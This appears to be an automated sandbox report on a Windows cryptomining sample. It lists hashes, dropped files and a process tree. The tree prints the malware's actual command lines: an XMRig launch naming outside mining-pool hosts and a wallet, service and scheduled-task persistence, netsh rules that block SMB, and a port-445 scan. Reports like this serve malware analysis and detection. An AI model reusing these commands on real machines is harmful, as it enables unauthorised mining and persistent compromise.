Analysis
-
max time kernel
151s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
19-05-2022 01:41
Behavioral task
behavioral1
Sample
aa.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
aa.exe
Resource
win10v2004-20220414-en
General
-
Target
aa.exe
-
Size
28.1MB
-
MD5
f9b2e96e5044fdaa7d923d516f6206e8
-
SHA1
936f9c88a574fede2fd37e54189e4b69c1215163
-
SHA256
b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
-
SHA512
c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
JOifcy.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\YVZLX\\JOifcy.exe" JOifcy.exe -
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
XMRig Miner Payload 9 IoCs
Processes:
resource yara_rule \Windows\YVZLX\JOifcy.exe xmrig \Windows\YVZLX\JOifcy.exe xmrig C:\Windows\YVZLX\JOifcy.exe xmrig C:\Windows\YVZLX\JOifcy.exe xmrig behavioral1/memory/1788-62-0x0000000000400000-0x0000000002054000-memory.dmp xmrig \Windows\YVZLX\dC.exe xmrig C:\Windows\YVZLX\dC.exe xmrig \Windows\YVZLX\dC.exe xmrig behavioral1/memory/1492-147-0x0000000000400000-0x0000000002054000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 4 IoCs
Processes:
JOifcy.exedC.exesvchost.exesvchost.exepid process 1492 JOifcy.exe 1512 dC.exe 2076 svchost.exe 2160 svchost.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 624 cmd.exe -
Loads dropped DLL 8 IoCs
Processes:
aa.exeJOifcy.execmd.execmd.exepid process 1788 aa.exe 1788 aa.exe 1492 JOifcy.exe 1720 1808 cmd.exe 1808 cmd.exe 2124 cmd.exe 2124 cmd.exe -
Drops file in Windows directory 64 IoCs
Processes:
JOifcy.exeaa.exesvchost.exedescription ioc process File created C:\Windows\YVZLX\etch-0.dll JOifcy.exe File created C:\Windows\YVZLX\riar.dll JOifcy.exe File created C:\Windows\YVZLX\chrome..fb JOifcy.exe File created C:\Windows\YVZLX\adfw.dll JOifcy.exe File created C:\Windows\YVZLX\libxml2.dll JOifcy.exe File created C:\Windows\YVZLX\posh-0.dll JOifcy.exe File created C:\Windows\YVZLX\ucl.dll JOifcy.exe File created C:\Windows\YVZLX\s.bat JOifcy.exe File created C:\Windows\YVZLX\tscl.html aa.exe File created C:\Windows\YVZLX\tibe-1.dll JOifcy.exe File created C:\Windows\YVZLX\tibe-2.dll JOifcy.exe File opened for modification C:\Windows\YVZLX\tscl.html JOifcy.exe File created C:\Windows\YVZLX\ssleay32.dll JOifcy.exe File created C:\Windows\YVZLX\eteb-2.dll JOifcy.exe File created C:\Windows\YVZLX\pcla-0.dll JOifcy.exe File created C:\Windows\YVZLX\WinRing0x64.sys JOifcy.exe File created C:\Windows\YVZLX\Cstr.xml JOifcy.exe File created C:\Windows\YVZLX\Cstr.exe JOifcy.exe File created C:\Windows\YVZLX\adfw-2.dll JOifcy.exe File opened for modification C:\Windows\YVZLX\svchost.exe JOifcy.exe File created C:\Windows\boy.exe aa.exe File created C:\Windows\YVZLX\libcurl.dll JOifcy.exe File created C:\Windows\YVZLX\trfo.dll JOifcy.exe File created C:\Windows\YVZLX\chrome..exe JOifcy.exe File created C:\Windows\YVZLX\libiconv-2.dll JOifcy.exe File created C:\Windows\YVZLX\trch-0.dll JOifcy.exe File created C:\Windows\YVZLX\exma.dll JOifcy.exe File created C:\Windows\YVZLX\dmgd-4.dll JOifcy.exe File created C:\Windows\YVZLX\exma-1.dll JOifcy.exe File created C:\Windows\YVZLX\pcreposix-0.dll JOifcy.exe File created C:\Windows\YVZLX\svchost.exe JOifcy.exe File opened for modification C:\Windows\YVZLX\s.bat JOifcy.exe File created C:\Windows\YVZLX\coli-0.dll JOifcy.exe File created C:\Windows\YVZLX\esco-0.dll JOifcy.exe File created C:\Windows\YVZLX\tibe.dll JOifcy.exe File created C:\Windows\YVZLX\trfo-0.dll JOifcy.exe File created C:\Windows\IME\tps.exe aa.exe File created C:\Windows\YVZLX\etchCore-0.x86.dll JOifcy.exe File created C:\Windows\YVZLX\chrome..xml JOifcy.exe File created C:\Windows\YVZLX\trch-1.dll JOifcy.exe File created C:\Windows\YVZLX\dC.exe JOifcy.exe File created C:\Windows\YVZLX\qdx.bat JOifcy.exe File created C:\Windows\YVZLX\cnli-1.dll JOifcy.exe File created C:\Windows\YVZLX\riar-2.dll JOifcy.exe File created C:\Windows\YVZLX\zlib1.dll JOifcy.exe File created C:\Windows\YVZLX\cnli-0.dll JOifcy.exe File created C:\Windows\YVZLX\crli-0.dll JOifcy.exe File created C:\Windows\YVZLX\etchCore-0.x64.dll JOifcy.exe File created C:\Windows\YVZLX\etebCore-2.x86.dll JOifcy.exe File created C:\Windows\YVZLX\iconv.dll JOifcy.exe File created C:\Windows\YVZLX\libeay32.dll JOifcy.exe File created C:\Windows\YVZLX\pcrecpp-0.dll JOifcy.exe File opened for modification C:\Windows\YVZLX\Result.txt svchost.exe File created C:\Windows\end.bat JOifcy.exe File created C:\Windows\YVZLX\Cstr.fb JOifcy.exe File created C:\Windows\YVZLX\dmgd-1.dll JOifcy.exe File created C:\Windows\YVZLX\etebCore-2.x64.dll JOifcy.exe File created C:\Windows\YVZLX\tucl-1.dll JOifcy.exe File created C:\Windows\YVZLX\JOifcy.exe aa.exe File created C:\Windows\YVZLX\posh.dll JOifcy.exe File created C:\Windows\YVZLX\trfo-2.dll JOifcy.exe File created C:\Windows\YVZLX\tucl.dll JOifcy.exe File created C:\Windows\YVZLX\zibe.dll JOifcy.exe File created C:\Windows\YVZLX\ip.dll JOifcy.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 51 IoCs
Processes:
JOifcy.exepid process 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe 1492 JOifcy.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 468 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
dC.exedescription pid process Token: SeLockMemoryPrivilege 1512 dC.exe Token: SeLockMemoryPrivilege 1512 dC.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
aa.exeJOifcy.exepid process 1788 aa.exe 1788 aa.exe 1492 JOifcy.exe 1492 JOifcy.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
aa.exeJOifcy.execmd.execmd.exedescription pid process target process PID 1788 wrote to memory of 1492 1788 aa.exe JOifcy.exe PID 1788 wrote to memory of 1492 1788 aa.exe JOifcy.exe PID 1788 wrote to memory of 1492 1788 aa.exe JOifcy.exe PID 1788 wrote to memory of 1492 1788 aa.exe JOifcy.exe PID 1788 wrote to memory of 624 1788 aa.exe cmd.exe PID 1788 wrote to memory of 624 1788 aa.exe cmd.exe PID 1788 wrote to memory of 624 1788 aa.exe cmd.exe PID 1788 wrote to memory of 624 1788 aa.exe cmd.exe PID 1492 wrote to memory of 1400 1492 JOifcy.exe cmd.exe PID 1492 wrote to memory of 1400 1492 JOifcy.exe cmd.exe PID 1492 wrote to memory of 1400 1492 JOifcy.exe cmd.exe PID 1492 wrote to memory of 1400 1492 JOifcy.exe cmd.exe PID 1400 wrote to memory of 764 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 764 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 764 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 764 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 776 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 776 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 776 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 776 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1780 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1780 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1780 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1780 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 544 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 544 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 544 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 544 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1248 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1248 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1248 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1248 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1288 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1288 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1288 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1288 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 856 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 856 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 856 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 856 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 240 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 240 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 240 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 240 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1608 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1608 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1608 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1608 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1728 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1728 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1728 1400 cmd.exe netsh.exe PID 1400 wrote to memory of 1728 1400 cmd.exe netsh.exe PID 1492 wrote to memory of 1004 1492 JOifcy.exe cmd.exe PID 1492 wrote to memory of 1004 1492 JOifcy.exe cmd.exe PID 1492 wrote to memory of 1004 1492 JOifcy.exe cmd.exe PID 1492 wrote to memory of 1004 1492 JOifcy.exe cmd.exe PID 1492 wrote to memory of 1332 1492 JOifcy.exe cmd.exe PID 1492 wrote to memory of 1332 1492 JOifcy.exe cmd.exe PID 1492 wrote to memory of 1332 1492 JOifcy.exe cmd.exe PID 1492 wrote to memory of 1332 1492 JOifcy.exe cmd.exe PID 1004 wrote to memory of 832 1004 cmd.exe netsh.exe PID 1004 wrote to memory of 832 1004 cmd.exe netsh.exe PID 1004 wrote to memory of 832 1004 cmd.exe netsh.exe PID 1004 wrote to memory of 832 1004 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\aa.exe"C:\Users\Admin\AppData\Local\Temp\aa.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\YVZLX\JOifcy.exeC:\Windows\YVZLX\JOifcy.exe2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "3⤵
-
C:\Windows\SysWOW64\sc.exesc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\YVZLX\qdx.bat" "3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\YVZLX\JOifcy.exe" /SC ONSTART4⤵
- Creates scheduled task(s)
-
C:\Windows\YVZLX\dC.exe"C:\Windows\YVZLX\dC.exe" -o stratum+tcp://wk.monerogx.com:6502 -o stratum+tcp://note.monerogx.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\YVZLX\s.bat" "3⤵
- Loads dropped DLL
-
C:\Windows\YVZLX\svchost.exesvchost.exe syn 10.127.0.0 10.127.255.255 445 /save4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\YVZLX\s.bat" "3⤵
- Loads dropped DLL
-
C:\Windows\YVZLX\svchost.exesvchost.exe tcp 10.127.0.0 10.127.255.255 445 450 /save4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"2⤵
- Deletes itself
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\YVZLX\JOifcy.exeFilesize
28.1MB
MD5f9b2e96e5044fdaa7d923d516f6206e8
SHA1936f9c88a574fede2fd37e54189e4b69c1215163
SHA256b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
SHA512c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1
-
C:\Windows\YVZLX\JOifcy.exeFilesize
28.1MB
MD5f9b2e96e5044fdaa7d923d516f6206e8
SHA1936f9c88a574fede2fd37e54189e4b69c1215163
SHA256b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
SHA512c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1
-
C:\Windows\YVZLX\dC.exeFilesize
6.8MB
MD590f9e1fdec81ccf508fc58f3d23156b5
SHA1066783e092007d2bcd10e2bbf412269fb9260d3f
SHA256d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018
SHA5128463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95
-
C:\Windows\YVZLX\qdx.batFilesize
116B
MD59c34c98dff5bd8f258dadd08e5d45d89
SHA1127dd3b015b860d4ed61011a382a4e32fbac9f82
SHA25645c6862ce8304f27134577563eda26c320f08caa5797c33ae1765acbe464637f
SHA5124650a0c32df7fe761804651c108b6058459fedc85aeba47bf222f780a2554e1dca62515528ff80ea6c208553726f1df97d343dcca90d6697cbf852b085e18d9f
-
C:\Windows\YVZLX\s.batFilesize
335B
MD5b5f17481d6d186362e1b989d59f4485b
SHA1286e596314689831c647c43a2d7258e7704062bb
SHA25692d3d97610deea1906de9c1303e5928808d65c1bb6b0653613e13c0fa81a91f5
SHA5125918ae4392e4b7b381426cd121478e12e2f7abbab3bbdeba5f383231aaff25436442f34a8735bc8efa3ab422650cccaf03fcaf22d627a0c10e5e1adbdacb9698
-
C:\Windows\YVZLX\s.batFilesize
338B
MD58e1fa5b53b2321b93a89316b11ed845b
SHA186254840496799d0ee5aafc225ceee6864d12b22
SHA256e1e488051d8e7d68f52ff6e94b11c7ab24d23859effe38b0a274cdb9a5b912e8
SHA51292ba0019615a0f5b7fa950683d6e00f02103e7ac964d4e58d8d0682d9a2bc4a0566c9f7cb7db1a24e7cbb9b056738d7ab65873cb545d03c6d8bd4ee542240653
-
C:\Windows\YVZLX\svchost.exeFilesize
14KB
MD5c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\YVZLX\svchost.exeFilesize
14KB
MD5c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\YVZLX\svchost.exeFilesize
14KB
MD5c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\YVZLX\svchost.exeFilesize
14KB
MD5c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\YVZLX\tscl.htmlFilesize
6B
MD582ca5289b507fb42fd3c3f957b240626
SHA1198b418473a770773cc5265c0f263655c4c4022f
SHA2563eafb956900ebaf7bf7e18555e823bf227c51962d06ca5c05c9b2d889d69f62e
SHA512d9cd1ad6bcffe6a155e471d2cea8e9ffac44a5ca5da9716871a4fdfda5c852182da5f1e5af3712abb0b382846db90c326faba91e95416ec9e283781560ebeb97
-
C:\Windows\end.batFilesize
1KB
MD5c017d5f762ae5d67efb7d099b53cca58
SHA1ab7f8553de7614251d76ce54aaee52f1a35e7ae6
SHA256d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b
SHA512856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78
-
C:\Windows\end.batFilesize
1KB
MD5c017d5f762ae5d67efb7d099b53cca58
SHA1ab7f8553de7614251d76ce54aaee52f1a35e7ae6
SHA256d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b
SHA512856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78
-
\Windows\YVZLX\JOifcy.exeFilesize
28.1MB
MD5f9b2e96e5044fdaa7d923d516f6206e8
SHA1936f9c88a574fede2fd37e54189e4b69c1215163
SHA256b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
SHA512c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1
-
\Windows\YVZLX\JOifcy.exeFilesize
28.1MB
MD5f9b2e96e5044fdaa7d923d516f6206e8
SHA1936f9c88a574fede2fd37e54189e4b69c1215163
SHA256b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
SHA512c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1
-
\Windows\YVZLX\dC.exeFilesize
6.8MB
MD590f9e1fdec81ccf508fc58f3d23156b5
SHA1066783e092007d2bcd10e2bbf412269fb9260d3f
SHA256d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018
SHA5128463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95
-
\Windows\YVZLX\dC.exeFilesize
6.8MB
MD590f9e1fdec81ccf508fc58f3d23156b5
SHA1066783e092007d2bcd10e2bbf412269fb9260d3f
SHA256d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018
SHA5128463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95
-
\Windows\YVZLX\svchost.exeFilesize
14KB
MD5c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
\Windows\YVZLX\svchost.exeFilesize
14KB
MD5c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
\Windows\YVZLX\svchost.exeFilesize
14KB
MD5c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
\Windows\YVZLX\svchost.exeFilesize
14KB
MD5c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
memory/240-79-0x0000000000000000-mapping.dmp
-
memory/308-96-0x0000000000000000-mapping.dmp
-
memory/544-71-0x0000000000000000-mapping.dmp
-
memory/624-61-0x0000000000000000-mapping.dmp
-
memory/696-123-0x0000000000000000-mapping.dmp
-
memory/764-89-0x0000000000000000-mapping.dmp
-
memory/764-65-0x0000000000000000-mapping.dmp
-
memory/776-67-0x0000000000000000-mapping.dmp
-
memory/832-88-0x0000000000000000-mapping.dmp
-
memory/840-132-0x0000000000000000-mapping.dmp
-
memory/856-77-0x0000000000000000-mapping.dmp
-
memory/880-103-0x0000000000000000-mapping.dmp
-
memory/1004-85-0x0000000000000000-mapping.dmp
-
memory/1112-107-0x0000000000000000-mapping.dmp
-
memory/1152-110-0x0000000000000000-mapping.dmp
-
memory/1204-128-0x0000000000000000-mapping.dmp
-
memory/1248-99-0x0000000000000000-mapping.dmp
-
memory/1248-73-0x0000000000000000-mapping.dmp
-
memory/1288-75-0x0000000000000000-mapping.dmp
-
memory/1332-86-0x0000000000000000-mapping.dmp
-
memory/1376-106-0x0000000000000000-mapping.dmp
-
memory/1400-63-0x0000000000000000-mapping.dmp
-
memory/1420-119-0x0000000000000000-mapping.dmp
-
memory/1492-57-0x0000000000000000-mapping.dmp
-
memory/1492-147-0x0000000000400000-0x0000000002054000-memory.dmpFilesize
28.3MB
-
memory/1512-135-0x0000000000000000-mapping.dmp
-
memory/1512-148-0x0000000000000000-0x0000000001000000-memory.dmpFilesize
16.0MB
-
memory/1512-138-0x0000000000DF0000-0x0000000000E04000-memory.dmpFilesize
80KB
-
memory/1528-92-0x0000000000000000-mapping.dmp
-
memory/1532-130-0x0000000000000000-mapping.dmp
-
memory/1536-114-0x0000000000000000-mapping.dmp
-
memory/1608-81-0x0000000000000000-mapping.dmp
-
memory/1624-118-0x0000000000000000-mapping.dmp
-
memory/1680-115-0x0000000000000000-mapping.dmp
-
